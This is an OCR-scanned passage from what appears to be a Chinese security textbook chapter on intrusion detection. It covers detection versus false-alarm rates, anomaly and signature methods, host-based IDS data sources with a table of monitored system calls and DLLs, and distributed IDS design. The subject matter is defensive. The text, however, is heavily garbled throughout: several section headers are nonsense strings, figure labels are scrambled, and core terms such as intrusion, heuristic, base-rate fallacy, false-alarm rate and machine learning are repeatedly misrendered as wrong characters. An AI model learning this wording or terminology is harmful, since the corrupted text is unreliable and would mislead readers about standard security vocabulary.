折 中 的 艺术 。 理 想 情 况 下 ， 你 希望 IDS 具有 较 高 的 检测 率 ( 即 检测 到 的 攻击 数 与 攻击 总 数 的 比 
率 )， 同 时 最 小 化 误 报 率 ( 即 错误 分 类 数 与 正常 使 用 总 数 的 比率 ) [LAZA05]。 

概率 密 


授权 用 户 
EURO naa Fha 
行为 曲线 








观测 行为 与 预 
期 行为 的 重 登 


入 侵 者 授权 用 户 可 测 行 
行为 均值 行为 均值 为 参数 


图 8-1 入 侵 者 和 授权 用 户 的 行为 曲线 


182 B-A tHHEMZARKS RE 


在 Anderson 的 一 项 重要 的 早期 研究 [ANDE80] 中 ， 假 定 某 个 系统 能 够 合理 确定 外 部 攻 
击 者 与 合法 用 户 之 间 的 区 别 。 合 法 用 户 的 行为 模式 可 以 通过 观察 合理 的 历史 行为 记录 建立 起 
来 ， 与 这 样 的 模式 有 显著 差异 的 行为 能 够 被 检测 出 来 。Anderson 指出 ， 检 测 内 部 攻击 者 ( 合 
法 用 户 以 非 授 权 的 方式 执行 操作 ) 将 困难 得 多 ， 因 为 此 时 异 和 常 和 正常 行为 的 差异 可 能 会 很 
小 。Anderson 总 结 出 仅 通 过 查找 异常 行为 不 能 检测 出 这 种 违规 使 用 。 但 通过 巧妙 地 定义 
表示 非 授权 使 用 的 条 件 集 ， 仍 然 可 能 检测 到 违法 者 。 这 些 结论 在 1980 年 得 出 ， 至 今 仍然 
使 用 。 


8.2.2 BRiBiz 


为 了 实用 性 ，IDS 应 该 能 检测 到 绝 大 多 数 的 人 侵 ， 同 时 保持 可 接受 级 别 的 误 报 率 。 如 果 只 
检测 到 有 限 比 例 的 实际 入 侵 ， 则 系统 给 人 以 安全 的 假象 。 另 一 方面 ， 如 果 系 统 在 没有 入 侵 的 时 
候 频 繁 报警 〈 误 报 )， 则 系统 管理 员 要 么 开始 忽略 报警 ， 要 么 浪费 很 多 时 间 分 析 误 报 。 

遗憾 的 是 ， 由 于 所 涉及 的 概率 性 质 ， 很 难 同时 满足 高 检测 率 和 低 误 报 率 的 标准 。 一 般 来 
讲 ， 如 果实 际 人 侵 数 比 系统 的 合法 使 用 数 低 ， 则 误 报 率 将 很 高 ， 除 非 测 试用 例 是 很 容易 区 别 
的 。 这 是 基 率 雇 误 现象 的 一 个 实例 。[AXEL00] 对 已 有 的 IDS 进行 了 研究 ， 指 出 当前 人 侵 检测 
系统 不 能 解决 基 率 雇 误 的 问题 。 请 参阅 附录 工 关 于 此 数学 问题 的 简要 背景 介绍 。 


8.2.3 Bx 


[BALA98] 列 出 理想 的 IDS 必须 满足 的 条 件 如 下 : 

e 能 够 不 间断 地 运行 ， 而 且 人 的 参与 尽 可 能 少 。 

e 具有 容错 功能 ， 系 统 骨 演 时 ， 它 必须 能 够 很 快 恢复 和 重新 初始 化 。 
抵御 破坏 。IDS 必须 能 够 监测 目 身 ， 检 测 是 否 已 被 攻击 者 修改 。 
对 于 正 运行 的 系统 增加 最 小 的 开销 。 

能 够 根据 被 监测 系统 的 安全 策略 进行 配置 。 

能 够 自动 适应 系统 和 用 户 行为 变化 。 

能 够 扩展 以 监测 更 多 的 主机 。 

能 够 提供 很 好 的 服务 降级 ， 也 就 是 说 ， 如 果 IDS 的 某 些 组 件 停止 工作 ,无论 出 于 何 种 
原因 ， 其 余部 分 应 受到 尽 可 能 少 的 影响 。 

e 人 允许 动态 重新 配置 ， 即 能 够 重新 配置 IDS， 而 不 必 重 新 启动 。 


8.3 ”分析 方法 


IDS 通常 使 用 以 下 几 种 方法 之 一 来 分 析 传 感 右 得 到 的 数据 进而 检测 入 侵 : 

1. 异常 检测 ( anomaly detection): 包括 采集 有 关 合 法 用 户 在 某 段 时 间 内 的 行为 数据 ， 然 后 
分 析 当 前 观察 到 的 行为 ， 以 较 高 的 置信 度 确定 该 行为 是 合法 用 户 的 行为 还 是 和 人 侵 者 的 行为 。 

2. 特征 或 启发 式 检测 (signature or heuristic detection) : 使 用 一 组 已 知 恶 意 数据 模式 (特征 ) 
或 者 攻击 规则 (局 发 式 ) 组 成 的 集合 来 与 当前 的 行为 进行 比较 ， 最 终 确 定 这 是 否 是 一 个 人 侵 者 。 
这 种 方法 也 被 称 为 误 用 检测 ， 仅 仅 可 以 用 来 识别 有 模式 或 者 有 规则 的 已 知 攻击 。 

实质 上 ， 为 了 识别 恶意 或 未 经 授权 的 行为 ， 异 常 方法 都 虽 在 定义 正常 或 预期 之 中 的 行为 。 
特征 或 基于 局 发 式 的 方法 直接 定义 恶意 或 未 经 授权 的 行为 ， 并 且 可 以 快速 又 有 效 地 识别 已 知 的 
攻击 。 然 而 ， 只 有 异常 检测 才能 够 检测 出 未 知 的 0-day 攻击 ， 这 是 因为 它 是 用 已 知 的 正常 行为 
去 识别 异常 行为 。 由 于 存在 这 种 优势 ， 如 果 没 有 我 们 下 面 讨论 的 收集 和 分 析 数 据 的 困难 性 ， 以 
及 较 高 的 误 报 率 ， 很 明显 异常 检测 将 是 首选 的 方法 。 


BBE AREA 183 


8.3.1 异常 检测 


异常 检测 方法 包括 首先 在 训练 阶段 通过 收集 和 处 理 来 自 被 监测 系统 的 正常 操作 的 传 感 需 数 
据 来 开发 合法 用 户 行为 的 模型 。 这 可 能 发 生 在 不 同时 间 ， 或 者 可 能 有 一 个 持续 的 监控 和 演变 模 
型 的 过 程 。 一 旦 模型 建立 并 开始 进行 检测 ， 当 前 被 观测 到 的 行为 就 会 与 模型 进行 比较 ， 从 而 在 
检测 阶段 确定 这 是 合法 行为 还 是 人 侵 活动 。 

异常 检测 的 分 类 方法 很 多 ， 其 中 [GARC09] 大 致 分 类 为 : 

© 统计 法 (statistical): 使 用 单 因素 、 多 因素 或 者 观察 指标 的 时 序 模型 来 分 析 被 观测 行为 。 

e 基于 知识 法 (knowledge based): 使 用 专家 系统 ,根据 一 组 对 合法 行为 建 模 的 规则 对 观 

测 到 的 行为 进行 分 类 。 

© 机 器 学 习 法 ( machine-learning) : 使 用 数据 控 据 技术 从 训练 数据 中 自动 确定 合适 的 分 类 

模型 。 

有 两 个 关键 问题 会 影响 到 这 些 方法 的 性 能 ， 分 别 是 效率 和 检测 过 程 的 开销 。 

被 监测 的 数据 首先 应 参数 化 为 预期 标准 的 指标 ， 这 些 指 标 随 后 会 用 于 分 析 过 程 。 这 个 步骤 
确保 了 经 由 各 种 各 样 数 据 源 收 集 而 来 的 数据 以 标准 的 形式 用 于 分 析 。 

统计 方法 使 用 捕获 的 传感器 数据 生成 一 个 观测 指标 的 统计 曲线 。 最 早 的 方法 是 使 用 单 变量 
模型 ， 即 每 一 个 指标 都 被 看 作 一 个 独立 的 随机 变量 。 然 而 ， 这 种 方式 实在 过 于 粗糙 以 至 于 无 法 
高 效 地 识别 出 入 侵 行为 。 之 后 ， 考 虑 指标 之 间 关 联 的 多 变量 模型 应 运 而 生 ， 获 得 了 更 好 的 区 分 
度 。 时 序 模型 采用 顺序 和 事件 之 间 的 时 间 来 更 好 地 区 分 行为 。 这 些 统计 方法 的 优点 主要 有 相对 
简单 、 计 算 开 销 较 低 、 不 需要 关于 行为 预期 的 假设 等 。 缺 点 则 包括 选择 合适 的 指标 达到 误 报 和 
泪 报 的 平衡 十 分 困难 ， 以 及 不 是 所 有 的 行为 都 可 以 用 这 些 方法 进行 建 模 。 

基于 知识 的 方法 是 采用 规则 集 对 观测 数据 进行 分 类 。 这 些 规则 通常 在 训练 阶段 中 手动 生 
成 ， 将 其 特征 化 并 归 人 到 特定 的 分 类 中 。 这 些 规则 可 以 采用 诸如 有 限 自 动机 、 标 准 描述 语言 等 
形式 化 工具 进行 描述 。 在 随后 的 检测 阶段 ， 它 们 被 用 来 对 观测 数据 进行 分 类 。 基 于 知识 的 方法 
的 优点 是 具有 健壮 性 和 灵活 性 ， 主 要 缺点 则 是 困难 性 、 从 数据 中 生成 高 质量 知识 的 时 间 要 求 以 
及 对 辅助 这 一 过 程 的 技术 专家 的 需求 。 

机 符 学 习 方 法 是 运用 数据 挖掘 技术 ， 利 用 标记 过 的 训练 数据 目 动 化 地 生成 模型 。 这 个 模型 
随后 可 以 被 用 来 持续 地 对 观测 数据 进行 分 类 ， 确 定 是 正常 数据 还 是 异常 数据 。 该 方法 的 致命 缺 
点 是 训练 过 程 通常 需要 相当 长 的 时 间 和 相当 大 的 计算 资源 。 然 而 , 一旦 模型 建立 完毕 ， 随 后 的 
分 析 则 通常 具有 很 高 的 效率 。 | 

SPL ae DIATE CARA, IFRS TAA RL, TR: 

e 贝 叶 斯 网 络 (Bayesian network): 编码 观测 指标 之 间 的 概率 联系 。 

e 马尔 可 夫 模型 ( Markov model): 用 状态 集 开 发 的 模型 ， 一 些 状 态 可 能 是 隐藏 的 ， 并 且 

是 通过 转移 概率 相互 关联 的 。 
© 神经 网 络 (neural network): 用 神经 元 和 它们 之 间 的 突 触 模 拟人 类 大 脑 的 运作 ， 对 观测 
到 的 数据 进行 分 类 。 

e 模糊 逻辑 ( fuzzy logic): 使 用 模糊 集 理 论 ， 该 理论 中 推理 是 近似 的 ， 能 够 适应 不 确 

定性 。 

e 遗传 算法 (genetic algorithm): 这 是 根据 进化 生物 学 而 产生 的 技术 ， 使 用 遗传 、 突 变 、 

选择 、 重 组 等 方法 形成 分 类 规则 。 

© 聚 类 和 离 群 检测 (clustering and outlier detection): 基于 相似 性 或 者 距离 向 量 对 观测 数据 

进行 分 组 ， 将 其 归 入 不同 的 集群 中 ， 进 而 对 随后 的 数据 进行 识别 ， 确 认 其 究竟 是 属于 
某 一 个 集群 ， 还 是 一 个 离 群 数据 。 
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机 融 学 习 方法 的 优点 是 它们 的 灵活 性 、 适 应 性 ， 以 及 抓 住 观测 指标 之 间 内 在 联系 的 能 力 。 
它们 的 缺点 则 是 对 有 关 一 个 系统 的 可 接受 行为 假设 的 依赖 、 目 前 无 法 接受 的 高 误 报 率 ， 以 及 较 
高 的 资源 开销 。 

在 IDS 所 使 用 的 异常 检测 方法 中 ,尤其 是 机 需 学 习 方 法 ， 一 个 关键 的 限制 是 它们 通常 只 
使 用 合法 数据 进行 训练 ,不 像 [CHAN09] 调研 的 其 他 方法 ， 同 时 使 用 合法 的 和 蜡 常 的 训练 数 
据 。 异 稼 训练 数据 的 缺乏 限制 了 上 面 列 出 的 一 些 技术 的 效果 ， 因 为 这 些 异 党 训 练 数据 可 能 有 助 
于 发 现 当 前 未 知 的 新 攻击 。 


8.3.2 ”特征 或 局 发 式 检测 


特征 或 局 发 式 检测 是 通过 观测 系统 中 的 事件 来 检测 人 侵 。 该 方法 是 利用 一 组 特征 模式 数据 
或 者 一 组 特征 化 的 规则 来 确定 观测 到 的 数据 究竟 是 正常 的 还 是 异常 的 。 

特征 方法 是 用 一 个 大 的 已 知 恶意 数据 模式 的 集合 去 匹配 系统 中 或 发 送 到 网 络 中 的 数据 。 特 
征集 合 需要 足够 大 ， 这 样 可 以 在 尽 可 能 减 小 误 报 率 的 同时 检测 到 最 多 的 恶意 数据 。 该 方法 被 广 
泛 应 用 于 反 病 毒 产品 、 网 络 流量 扫描 代理 以 及 NIDS 中 。 它 的 优点 是 相对 较 低 的 时 间 和 资源 开 
销 ， 以 及 它 的 广泛 可 用 性 。 缺 点 则 是 需要 大 量 的 精力 来 实时 识别 和 检查 新 的 恶意 软件 并 为 它们 
创建 特征 ， 以 便 系 统 能 够 识别 它们 。 此 外 它 也 没有 办 法 检测 到 没有 任何 特征 可 言 的 0-day 攻击 。 

基于 规则 的 启发 式 识别 是 采用 规则 来 识别 已 知 的 渗透 或 者 利用 已 知 漏洞 进行 的 渗透 。 规 则 
还 可 用 来 识别 可 疑 行 为 ， 即 使 该 行为 并 未 超出 已 建立 的 可 用 模式 范围 。 通 常 ， 系 统 中 使 用 的 规 
则 与 特定 的 机 融和 操作 系统 有 关 。 开 发 这 样 的 规则 最 有 效 的 方法 是 分 析 从 Internet 上 收集 到 的 
攻击 工具 和 脚本 。 这 些 规则 可 以 作为 由 知识 渊博 的 安全 人 员 制 定 的 规则 的 补充 。 在 后 一 种 情况 
下 ,正常 的 过 程 是 采访 系统 管理 员 和 安全 分 析 员 以 收集 一 套 已 知 的 渗透 场景 和 威胁 目标 系统 安 
全 的 关键 事件 。 

我 们 将 在 8.9 节 讨 论 Snort 系统 ， 这 是 一 个 基于 规则 的 NIDS 实例 ， 它 拥有 一 个 大 的 规则 
集合 用 来 检测 各 种 各 样 的 网 络 攻击 。 


8.4 基于 主机 的 入 侵 检测 


基于 主机 的 IDS (HIDS) 向 易 受 攻击 或 敏感 的 系统 中 添加 专用 的 安全 软件 层 ， 实 例 包 括 数 
据 库 服务 器 和 管理 系统 。 基 于 主机 的 IDS 以 多 种 方式 监测 系统 上 的 活动 ， 目 的 是 检测 系统 上 
的 可 疑 行为 。 在 某 些 情况 下 ， 正 如 我 们 将 在 9.6 节 讨 论 的 那样 ，IDS 可 以 在 任何 损害 发 生 之 前 
阻止 攻击 ， 但 它 的 主要 目的 还 是 检测 入 侵 、 记 录 可 疑 事件 ， 并 发 送 警 报 。 

HIDS 的 主要 优点 是 ， 它 可 以 检测 外 部 和 内 部 人 侵 ， 这 一 点 是 基于 网 络 的 IDS 或 者 防火 墙 
所 不 及 的 。 正 如 我 们 先前 所 言 ， 基 于 主机 的 IDS 可 以 使 用 异常 、 特 征 、 启 发 式 方法 来 检测 受 
监视 主机 上 的 未 授权 的 行为 。 我 们 首先 介绍 一 下 用 于 HIDS 的 常见 数据 源 和 传感器 ， 然 后 继续 
讨论 异常 、 特 征 和 局 发 式 方法 如 何 应 用 在 HIDS 中 ， 最 后 再 研究 分 布 式 HIDS。 


8.4.1 KRUR Mas 


正如 前 面 所 提 到 的 ， 入 侵 检 测 的 一 个 基本 组 件 是 用 来 收集 数据 的 传感器 。 一 些 用 户 不 间断 
的 活动 记录 必须 作为 输入 提供 给 IDS 的 分 析 组 件 。 常 见 的 数据 源 包 括 : 
e 系统 调用 踪迹 ( system call trace): 由 于 Forrest[CREE13] 开创 性 的 工作 ， 进 程 在 系统 上 的 
一 系列 系统 调用 记录 被 公认 为 是 用 于 HIDS 的 首选 数据 源 。 这 种 数据 源 在 UNIX/Linux 
系统 中 更 为 有 效 ， 在 Windows 系统 中 则 存在 问题 ， 这 是 由 于 大 量 使 用 的 DLL 会 掩盖 
那些 使 用 特定 的 系统 调用 的 进程 。 
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e Hit (日 志文 件 ) 记录 (audit (log file) record) 9: 大 多 数 现代 操作 系统 ， 包 括 会 计 软 件 ， 
都 会 收集 用 户 活动 的 相关 信息 。 这 样 做 的 优势 是 不 需要 额外 的 信息 收集 软件 ， 缺 点 则 
是 审计 记录 可 能 并 不 包括 所 需 的 信息 或 者 信息 不 会 以 一 个 便利 的 形式 给 出 ， 入 侵 者 可 
能 会 企图 操纵 这 些 记录 来 隐藏 他 们 的 活动 。 

e 文件 完整 性 校 验 和 (file integrity checksum): 在 系统 中 检测 入 侵 者 活动 的 一 种 常用 方法 

是 通过 将 关键 文件 的 当前 加 密 校 验 和 与 已 知 正确 值 的 记录 进行 比较 ， 从 而 定期 扫描 关 

键 文件 以 查找 所 需 基准 的 变化 。 该 方法 的 缺点 是 需要 用 已 有 的 正常 文件 生成 和 保护 校 

验 和 ， 以 及 监控 变化 的 文件 的 困难 性 。Tripwire 就 是 一 个 采用 该 方法 的 著名 系统 。 

注册 表 访 问 (registry access): 考虑 到 注册 表 中 信息 的 数量 和 系统 中 想 要 访问 它 的 程 

Fe, 在 Windows 系统 上 的 一 个 方法 是 监控 对 注册 表 的 访问 。 然 而 这 个 数据 源 过 于 针对 

Windows， 因 而 只 有 有 限 的 成 功 记 录 。 

传 感 占 从 选 定 的 数据 源 来 收集 数据 ， 从 中 过 滤 掉 不 需要 的 信息 ， 将 其 记录 为 标准 化 的 格 

式 ， 最 终 发 送 结果 到 本 地 或 者 远程 的 IDS 分 析 需 中 。 


8.4.2 异常 HIDS 


由 于 在 UNIX 和 Linux 系统 收集 合适 数据 较为 容易 ， 因 此 基于 异 第 的 HIDS 主要 是 在 
UNIX 和 Linux 系统 上 实现 的 。 尽 管 一 些 早期 的 工作 使 用 了 审计 或 财务 记录 ， 但 主要 还 是 基于 
系统 调用 踪迹 。 系 统 调 用 为 应 用 程序 提供 了 一 系列 和 底层 操作 系统 交互 的 图 数 ， 这 是 程序 访问 
系统 内 核 的 方法 。 因 此 它们 提供 了 进程 活动 的 详细 信息 ， 这 些 信息 可 以 被 用 来 确定 行为 是 正常 
的 还 是 异常 的 。 表 8-2a 列 出 当前 Ubuntu Linux 系统 使 用 的 系统 调用 的 一 个 实例 。 这 些 数据 通 
常 使 用 操作 系统 钩子 (OS hook) 来 搜集 ， 例 如 BSM 审计 模块 。 大 多 数 现代 操作 系统 都 有 收集 
这 类 信息 的 高 可 靠 方 法 。 

之 后 ， 系 统 调用 记录 会 由 一 个 适当 的 决策 引擎 进行 分 析 。[CREE13] 指出 Forrest 等 人 的 
原创 工作 引入 了 基于 人 工 免 疫 系 统 方法 的 序列 时 间 延 迟 租 人 (Sequence Time-DelayEmbedding, 
STIDE) 算法 ， 该 算法 将 观察 到 的 系统 调用 序列 与 来 自 训 练 阶 段 的 序列 进行 比较 ， 以 获得 可 以 
决定 序列 是 否 正 常 的 不 匹配 比率 。 后 续 的 工作 也 有 人 采用 其 他 方案 来 进行 这 种 分 类 ， 比 如 隐 
马尔 可 夫 模 型 ( Hidden Markov Model, HMM)、 人 工 神 经 网 络 ( ArtificialNeural Network, ANN), 
支持 向 量 机 (Support Vector Machine, SVM)、 极 限 学 习 机 (Extreme LearningMachine, ELM) 等 。 

[CREE13] 还 提 到 ， 尽 管 采用 较 老 的 测试 数据 集 ， 这 些 方法 都 提供 了 95% ~ 99% 的 入 侵 
检测 率 ， 同 时 低 于 5% 的 举报 率 ， 这 是 比较 合理 的 。 其 使 用 最 近 的 数据 和 攻击 实例 、 更 密集 
的 系统 调用 特征 抽取 以 及 高 检测 率 低 漏 报 率 的 ELM 决策 引擎 对 结果 进行 了 更 新 。 在 不 久 的 将 
来 ， 这 种 方法 应 该 能 产生 更 为 高 效 的 HIDS 产品 。 

传统 上 讲 ，Windows 系统 并 没有 使 用 基于 异常 的 HIDS， 这 是 由 于 广泛 使 用 动态 链接 库 
( Dynamic Link Library, DLL) 造成 的 。 动 态 链接 库 作为 进程 请 求 操 作 系 统 防 数 和 实际 系统 ”|263 
调用 接口 的 中 间 层 ， 妨 碍 了 用 系统 调用 踪迹 来 识别 进程 行为 。 有 一 些 工作 是 使 用 审计 日 志 记 
录 或 者 注册 表 文 件 更 新 信息 作为 数据 源 ， 但 是 没有 一 种 方法 十 分 成 功 。[CREE13] 提出 了 一 
种 使 用 关键 DLL 哺 数 调用 踊 迹 作为 数据 源 的 新 方法 ,其 结果 可 以 与 Linux 上 基于 系统 调用 
踪迹 的 HIDS IRK, K 8-2b 列 出 了 监控 的 关键 DLL 和 可 执行 文件 。 需 要 注意 的 是 ， 这 些 
DLL 中 的 数 以 千 计 的 函数 都 被 监控 ， 其 形式 等 价 于 表 8-2a 列 出 的 系统 调用 。 这 种 方法 的 采 
用 应 该 有 助 于 能 检测 0-day 攻击 的 高 效 Windows HIDS 的 开发 ， 而 不 像 我 们 随后 要 讨论 的 ， 
当前 特征 代 和 局 发 式 Windows HIDS, 


O 相对 于 入 侵 检测 而 言 ， 审 计 记录 在 计算 机 安全 中 起 到 了 更 为 广泛 的 作用 ， 在 第 18 章 详 细 讨 论 了 这 一 点 。 
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表 8-2 被 监控 的 Linux 系统 调用 和 Windows DLL 
a) Ubuntu Linux 系统 调用 


accept, access, acct, adjtime, aiocancel, aioread, aiowait, aiowrite, alarm, async_daemon, auditsys, bind, chdir, chmod, 
chown, chroot, close, connect, creat, dup, dup2, execv, execve, exit, exportfs, fchdir, fchmod, fchown, fchroot, fentl, flock, 
fork, fpathconf, fstat, fstat, fstatfs, fsync, ftime, ftruncate, getdents, getdirentries, getdomainname, getdopt, getdtablesize, 
getfh, getgid, getgroups, gethostid, gethostname, getitimer, getmsg, getpagesize, getpeername, getpgrp, getpid, getpriority, 
getrlimit, getrusage, getsockname, getsockopt, gettimeofday, getuid, gtty, ioctl, kill, killpg, link, listen, lseek, Istat, madvise, 
mctl, mincore, mkdir, mknod, mmap, mount, mount, mprotect, mpxchan, msgsys, msync, munmap, nfs_mount, nfssvc, nice, 
open, pathconf, pause, pcfs_mount, phys, pipe, poll, profil, ptrace, putmsg, quota, quotactl, read, readlink, readv, reboot, 
recv, recvfrom, recvmsg, rename, resuba, rfssys, rmdir, sbreak, sbrk, select, semsys, send, sendmsg, sendto, setdomainname, 
setdopt, setgid, setgroups, sethostid, sethostname, setitimer, setpgid, setpgrp, setpgrp, setpriority, setquota, setregid, setreuid, 
setrlimit, setsid, setsockopt, settimeofday, setuid, shmsys, shutdown, sigblock, sigpause, sigpending, sigsetmask, sigstack, 
sigsys, sigvec, socket, socketaddr, socketpair, sstk, stat, stat, statfs, stime, stty, swapon, symlink, sync, sysconf, time, times, 
truncate, umask, umount, uname, unlink, unmount, ustat, utime, utimes, vadvise, vfork, vhangup, vlimit, vpixsys, vread, 
vtimes, vtrace, vwrite, wait, wait3, wait4, write, writev 


b) 关键 Windows DLL 和 可 执行 文件 


comctl32 
kernel32 
msvcpp 
msvert 
mswsock 
ntdll 
ntoskrnl 
user32 
Ws2 32 


虽然 使 用 系统 调用 踪迹 为 HIDS 提供 了 最 为 丰富 的 信息 源 ， 但 在 信息 收集 和 分 类 过 程 中 ， 
它 却 给 被 监控 系统 增加 了 一 个 中 等 强度 的 负荷 。 正 如 我 们 前 面 所 提 到 的 ， 许 多 决策 引擎 的 训练 
过 程 都 需要 非常 长 的 时 间 和 大 量 的 计算 资源 。 因 此 ， 其 他 人 也 尝试 基于 审计 (日 志 ) 记录 的 方 
法 。 然 而 ， 这 些 方 法 相 较 系统 调用 踪迹 而 言 ， 不 但 检测 率 更 低 (报告 为 80%)， 而 且 也 更 容易 
受 入 侵 者 操作 的 影响 。 

另外 一 个 可 以 检测 当前 进程 行为 的 方法 是 ， 检 查 被 监控 主机 上 的 重要 文件 的 改变 。 该 方法 
是 使 用 密码 学 校 验 和 来 检测 被 监控 文件 任何 超越 基准 的 改变 。 通 常 所 有 的 程序 二 进 制 文 件 、 脚 
本 和 配置 文件 都 会 被 监控 ， 监 控 方 式 包 括 每 次 访问 监控 或 是 文件 系统 的 周期 性 扫描 。 被 广泛 使 
用 的 Tripwire 系统 就 是 基于 这 种 方法 实现 的 ， 它 可 以 用 在 包括 Linux, Mac OSX, Windows 在 
内 的 所 有 主流 操作 系统 上 。 这 种 方法 对 于 入 侵 活 动 或 其 他 活动 导致 的 被 监控 文件 的 变化 十 分 敏 
感 。 然 而 它 无 法 检测 运行 在 系统 上 的 进程 的 变化 。 其 他 的 困难 还 包括 决定 哪些 文件 应 该 监控 
(因为 可 操作 的 系统 中 有 数量 惊人 的 文件 会 变化 )， 访 问 每 个 已 知 正常 监控 文件 的 拷贝 来 创建 基 
准 值 ， 以 及 保护 文件 特征 数据 库 。 


8.4.3 ”特征 或 局 发 式 HIDS 


基于 特征 或 局 发 式 的 HIDS 被 广泛 使 用 ， 尤 其 常见 于 反 病 毒 程序 (A/V) 中 ， 或 者 更 准确 
地 说 ,第 见于 反 恶 意 软件 产品 中 。 基 于 特征 或 启发 式 的 HIDS 在 客户 端 系统 和 越 来 越 多 的 移动 
设备 上 被 非常 普遍 地 使 用 ， 并且 还 被 纳入 防火 墙 和 基于 网 络 的 IDS 中 的 邮件 和 Web 应 用 代理 
中 。 它 们 使 用 包含 了 在 已 知 恶意 软件 中 发 现 的 模式 数据 的 文件 特征 数据 库 ， 或 者 使 用 特征 化 的 
已 知 亚 意 行为 的 局 发 式 规则 。 
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这 些 产 品 在 检测 已 知 亚 意 软 件 方面 非常 高 效 ， 然 而 ， 它 们 没有 能 力 检测 没有 相关 特征 或 局 
发 式 规则 的 0-day 攻击 。 正 如 我 们 在 6.9 节 讨 论 的 那样 ， 它 们 在 Windows 系统 上 被 广泛 使 用 ， 
并 将 继续 成 为 人 侵 者 的 攻击 目标 。 


8.4.4 分布 式 HIDS 


传统 上 讲 ， 基 于 主机 的 IDS 的 工作 重点 在 于 单 系统 独立 操作 。 然 而 典型 的 大 型 企业 ， 需 
要 保护 由 局 域 网 或 Internet 连接 的 分 布 式 主机 集合 的 安全 。 虽 然 可 以 在 每 台 主 机 上 使 用 独立 的 
IDS 进行 防御 ， 但 通过 整个 网 络 中 的 IDS 之 问 的 协调 与 合作 ， 可 以 实现 更 有 效 的 防御 。 

Porras 指出 在 分 布 式 IDS 设计 中 主要 有 以 下 问题 [PORR92]: 

e 分 布 式 IDS 可 能 需要 处 理 不 同 格式 的 传 感 融 数据 。 在 异 构 环境 中 ,不 同 的 和 人 侵 检 测 系 

统 可 能 会 使 用 不 同 的 传 感 项 和 数据 采集 方法 。 

© 网 络 中 的 一 个 或 多 个 节点 负责 收集 和 分 析 网 络 中 各 系统 的 数据 。 因 此 ， 原 始 传 感 需 数 
据 或 汇总 数据 将 通过 网 络 传输 。 在 此 过 程 中 ， 必 须要 确保 这 些 数据 的 完整 性 和 机 密 性 。 
确保 完整 性 是 为 了 防止 人 侵 者 通过 更 改 传输 的 审计 信息 来 掩饰 他 的 活动 。 确 保 机 密 性 
则 是 因为 传输 的 审计 信息 可 能 是 有 价值 的 。 
集中 或 非 集中 式 体 系 结构 都 是 可 用 的 。 在 一 个 集中 式 体 系 结构 中 ， 由 一 个 中 心 节点 采 
集 和 分 析 所 有 的 传感器 数据 。 此 结构 减轻 了 对 输入 报告 进行 关联 分 析 的 任务 ， 但 却 产 
生 了 潜在 的 瓶颈 和 单 点 故障 问题 。 在 非 集中 式 体系 结构 中 有 多 个 分 析 中 心 ， 但 它们 必 
须 互 相 协调 自身 的 活动 和 建立 信息 交换 机 制 。 

分 布 式 IDS 一 个 很 好 的 实例 是 由 加 利 福 尼 亚 大 学 戴 维 斯 分 校 (University of California at 
Davis) 开发 的 [HEBE92，SNAP91] ; 类 似 的 方法 被 普度 大 学 [SPAF00，BALA9%8] 应 用 在 一 个 
项 目 中 。 图 8-2 显示 该 系统 的 体系 结构 由 三 个 主要 组 件 组 成 : 

1. 主机 代理 模块 (host agent module): 审计 采集 模块 作为 后 台 进 程 运行 在 监测 系统 上 。 其 
作用 是 收集 主机 上 与 安全 相关 事件 的 数据 并 且 将 这 些 数据 传输 到 中 央 管 理 器 。 图 8-3 展示 了 代 
理 模块 体系 结构 的 细节 。 

2. 局 域 网 监测 代理 模块 (LAN monitor agent module): 除了 分 析 局 域 网 流量 并 向 中 央 管 理 
侈 报告 结果 之 外 ， 它 与 主机 代理 模块 以 相同 的 方式 运行 。 

3. 中 央 管 理 器 模块 (central manager module): 从 局 域 网 监控 器 和 主机 代理 进程 接收 报告 并 
分 析 这 些 报告 ， 并 对 其 进行 关联 分 析 以 检测 入 侵 。 


局 域 网 监测 器 二 机 主机 


可 rans 
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图 8-2 分 布 式 人 侵 检测 体系 结构 
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该 方案 被 设计 为 独立 于 任何 操作 系统 或 系统 审计 实现 。 图 8-3 给 出 了 通常 采用 的 方法 。 
首先 ， 代 理 捕获 由 本 地 审计 采集 系统 产生 
的 每 个 审计 记录 。 通 过 过 滤 手 段 ， 保 留 那 
些 仅 与 安全 相关 的 记录 ， 并 将 这 些 记 录 标 
准 化 为 主机 审计 记录 (Host Audit Record, 
HAR) 格式 。 然 后 ,使 用 模板 驱动 的 逻辑 模 
块 分 析 可 疑 的 活动 记录 。 在 最 底层 上 ,， AR 
理会 扫描 那些 与 过 去 事件 无 关 并 值得 注意 
的 事件 ， 包 括 失 败 的 文件 、 访 问 系 统 文件 
和 更 改 文件 的 访问 控制 。 更 高 一 层 ， 代 理 
会 查找 事件 序列 ， 例 如 已 知 的 攻击 模式 ( 特 
征 )。 最 后 ， 代 理 根据 用 户 的 历史 行为 习惯 
查找 每 个 用 户 的 异常 行为 ， 如 执行 程序 数 、 as Tee ee 
访问 文件 数 等 。 

检测 到 可 疑 的 活动 时 ， 报 和 警 信 息 会 被 发 送 到 中 央 管 理 硕 。 中 央 管 理 需 使 用 专家 系统 ， 可 以 
从 收 到 的 数据 推导 出 可 能 的 后 果 。 中 央 管 理 需 还 可 能 会 主动 要 求 单个 主机 提供 HAR 的 副本 ， 
以 将 其 与 来 目 其 他 代理 的 审计 记录 进行 关联 分 析 。 

局 域 网 监测 器 代理 也 向 中 央 管 理 器 提供 信息 。 局 域 网 监测 代理 模块 审计 主机 与 主机 之 间 的 
连接 、 使 用 的 服务 和 网 络 流量 等 信息 ， 同 时 还 负责 搜索 重大 事件 ， 如 网 络 负载 的 突然 变化 、 与 
安全 相关 的 服务 的 使 用 以 及 可 疑 的 网 络 活动 。 

图 8-2 和 图 8-3 中 所 示 的 体系 结构 是 非常 通用 和 灵活 的 。 它 为 独立 于 机 需 的 方法 提供 了 基 
础 ， 这 种 方法 可 以 从 单独 的 入侵 检测 扩展 到 一 个 系统 ， 该 系统 能 够 将 来 自 多 个 站 点 和 网 络 的 活 
动 关联 起 来 ， 从 而 检测 出 可 疑 的 活动 ， 否 则 这 些 活动 将 不 会 被 发 现 。 


8.5 基于 网 络 的 入 侵 检 测 


基于 网 络 的 IDS ( 即 NIDS) 监控 的 是 一 个 网 络 或 多 个 相互 连接 的 网 络 上 选 定 的 位 置 的 网 
络 流量 。 NIDS 实时 或 接近 实时 地 检查 流量 数据 包 ， 试 图 检测 人 侵 模式 .NIDS 可 以 检测 网 络 层 、 
传输 层 或 应 用 层 协 议 的 活动 。 我 们 注意 到 基于 网 络 的 IDS 与 基于 主机 的 IDS 是 不 同 的 ，NIDS 
